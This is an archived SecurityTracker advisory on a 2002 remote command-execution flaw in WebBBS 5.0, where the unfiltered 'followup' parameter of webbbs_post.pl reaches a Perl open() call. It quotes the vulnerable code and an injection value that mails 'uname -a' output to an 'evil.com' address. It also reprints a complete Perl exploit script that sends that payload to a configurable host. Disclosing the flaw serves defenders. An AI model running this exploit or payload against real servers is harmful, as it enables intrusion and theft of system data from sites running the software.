SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WebBBS Vendors:   Burgdorf, Darryl
WebBBS Bulletin Board Input Validation Flaw in 'webbbs_post.pl' Allows Remote Users to Execute Arbitrary System Commands
SecurityTracker Alert ID:  1004568
SecurityTracker URL:  http://securitytracker.com/id/1004568
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 18 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.0
Description:   An input validation vulnerability was reported in the WebBBS bulletin board software. A remote user can execute arbitrary commands on the system with the privileges of the web server.

Nerf gr0up reported that the vulnerability exists in the 'webbbs_post.pl' script where no input filtering is performed on the '$followup' variable.

A remote user can submit a URL that modifies the contents of the $followup variable to include system commands.

A demonstration exploit value is provided:

followup=10;uname -a|mail zlo@evil.com|

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can execute system commands on the server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  awsd.com/scripts/webbbs/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  WebBBS 5.0 (andlater versions) vulnerable: allow commands




             	--== Nerf gr0up: adv #7 ==--  
 		     WebBBS remote command execution

Vulnerable:
WebBBS by Darryl Burgdorf 
(http://awsd.com/scripts/webbbs/).
All versions are vulnerable.
WebBBS is a Web-based bulletin board. WebBBS stores 
messages as simple text files.

Description:
WebBBS script allows command execution on server.
This script does no filtering and due to this
remote command execution is possible.

The vulnerable code is shown below:
-----
webbbs_post.pl: 

...
if ($FORM{'followup'}) { $followup = 
"$FORM{'followup'}"; }
...
if ($followup) {
...
		$subdir = "bbs".int($followup/1000);
		open 
(FOLLOWUP,"$dir/$subdir/$followup");
...
-----

Just change the value of $followup variable, e.g 
"followup=10" to 
"followup=10;uname -a|mail zlo@evil.com|" to exploit 
this vulnerability.

btr
nerf
www.nerf.ru

Attach (exploit in perl):

#!/usr/bin/perl
#
#  nerF gr0up
#
#  exploit code for
#  WebBBS by Darryl C. Burgdorf
#  all version up to 5.00 are vulnerable
#
#
#  this is an exploitation of "followup" bug.
#  it allows remote attacker to execute shell 
commands.
#  you can find WebBBS script at 
http://awsd.com/scripts/webbbs/
#
#  06.06.2002
#  btr // nerf
# nerf.ru

use IO::Socket;

        srand();
        $script = "/cgi-bin/webbbs/webbbs_config.pl";
        $command = "uname -a|mail zlo@evil.com";
        $host = "localhost";
        $port = 80;

        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . 
rand(254);
        $content = "$content" . "&body=" . rand(254);
        
$content="$content"."&followup=".rand(254)."|$command|";

        $content_length = length($content);
        $content_type = 
"application/x-www-form-urlencoded";

        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post 
HTTP/1.0\n";
        $buf = "$buf" . "Content-Type: 
$content_type\r\nContent-Length:";
        $buf = "$buf" . 
"$content_length\r\n\r\n$content", 0;

	print "\tnerF gr0up\n";
	print "exploit: WebBBS (awsd.com), version up 
to 5.00\n";

        print "sent:\n$buf\n";

if($socket = IO::Socket::INET->new("$host:$port")){

        print $socket "$buf";
        read($socket,$buf,1500);
        print "recieved:\n$buf\n";
}



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC